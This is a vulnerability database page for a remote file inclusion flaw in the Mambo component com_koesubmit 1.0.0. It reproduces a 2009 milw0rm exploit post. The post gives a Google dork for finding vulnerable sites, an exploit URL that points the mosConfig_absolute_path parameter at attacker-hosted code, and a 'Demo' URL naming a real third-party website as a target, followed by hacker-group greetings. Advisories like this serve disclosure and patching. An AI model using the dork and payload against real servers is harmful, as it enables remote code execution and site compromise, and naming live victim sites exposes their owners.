Mambo com_koesubmit 1.0.0 Remote File Inclusion

vendor:

com_koesubmit

by:

Don Tukulesto

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: com_koesubmit

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mambo:mambo_com_koesubmit:1.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mambo com_koesubmit 1.0.0 Remote File Inclusion

Mambo com_koesubmit 1.0.0 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application. Also, ensure that the application is running with the least privileges necessary.

Source

Exploit-DB raw data:

#############################################################################################################
## Mambo com_koesubmit 1.0.0 Remote File Inclusion   							   ##
## Author   : Don Tukulesto (root[at]indonesiancoder[dot]com)						   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date	    : Friday, Semptember 18, 2009     								   ##
## ------------------------------------------------------------------------------------------------------- ##
## _______            __                              __                 ______            __              ##
##|_     _|.-----..--|  |.-----..-----..-----..-----.|__|.---.-..-----. |      |.-----..--|  |.-----..----.##
## _|   |_ |     ||  _  ||  _  ||     ||  -__||__ --||  ||  _  ||     | |   ---||  _  ||  _  ||  -__||   _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__|  ##
##													   ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################

[ Software Information ]

[+] Software      : K?hn 1st-Submit ( com_koesubmit )
[+] Version	  : 1.0
[+] Vendor	  : www.alibasta.de 
[+] Vulnerability : Remote File Inclusion
[+] Google Dork   : inurl:"com_koesubmit"

#############################################################################################################
[ ExPL0!T ]

http://127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=attacker?


[ Demo ]

http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=
#############################################################################################################

[ HOLA !!! ]

[~] M3NW5, Gonzhack, MISTERSAINT, Cyb3r_tr0n, M364TR0N, v3n0m, Awan Bejat, Plaque, rey_cute
[~] Den Bayan, Den Awink, Chercut, NoGe, kecemplungkalen, Aries Deris, Xshadow, Jack-, Yadoy666 + Tante Miya
[~] kaMtiEz, arianom, RoNz, tiw0L, and You !!!

[ SHOUT ]

Selamat Idul Fitri 1930 H
Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin  :) 


AND FOR YOU ALL MALINGSIAL, YOU'RE TRULY THIEF IN ASIA.

# milw0rm.com [2009-09-17]